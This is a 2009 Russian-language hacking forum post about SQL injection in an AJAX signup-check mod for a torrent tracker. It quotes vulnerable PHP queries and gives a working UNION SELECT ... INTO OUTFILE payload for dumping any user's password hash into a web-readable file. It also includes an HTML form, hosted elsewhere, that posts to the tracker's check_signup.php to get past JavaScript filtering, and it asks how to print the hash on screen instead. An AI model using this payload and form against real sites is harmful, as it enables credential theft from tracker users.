
10.04.2009, 12:50
|
|
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме: 95382
Репутация:
29
|
|
По моему не было.
Мод AJAX проверка занятости e-mail и никнейма.
Бажные куски кода:
PHP код:
$res = (@mysql_fetch_row(@sql_query("select count(*) from users where username='$wantusername'"))) or die(mysql_error());
и
PHP код:
$res = (@mysql_fetch_row(@sql_query("select count(*) from users where email='$email'"))) or die(mysql_error());
Через данные уязвимости можно стырить пассхеш любого пользователя но как показала практика при запросе вида ' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt'/* -- @ukrnet.ua
Стандартный JS убивает = поэтому создаем на каком нибудь сервере страничку с содержанием
Код:
<form method="POST" action="http://АДРЕС_ТРЕКЕРА/check_signup.php">
<input type="text" name="user name" size="20">
<input type="text" name="emai l" size="20">
<input type="submit" value="go">
</form>
Вставляем в любое из полей SQL запрос и получаем в фаил 1.txt пассхеш.
P.S. При юзании данной уязвимости можно столкнутся с тем что веб сервер "изолирован" и тогда MySQL выдаст ошибку о не возможности сохранить фаил. Поэтому вопрос можно ли как нибудь составить SQL запрос чтобы он пассхеш вывел на экран? 
Последний раз редактировалось Rostov114; 12.04.2009 в 14:00..
|
|
|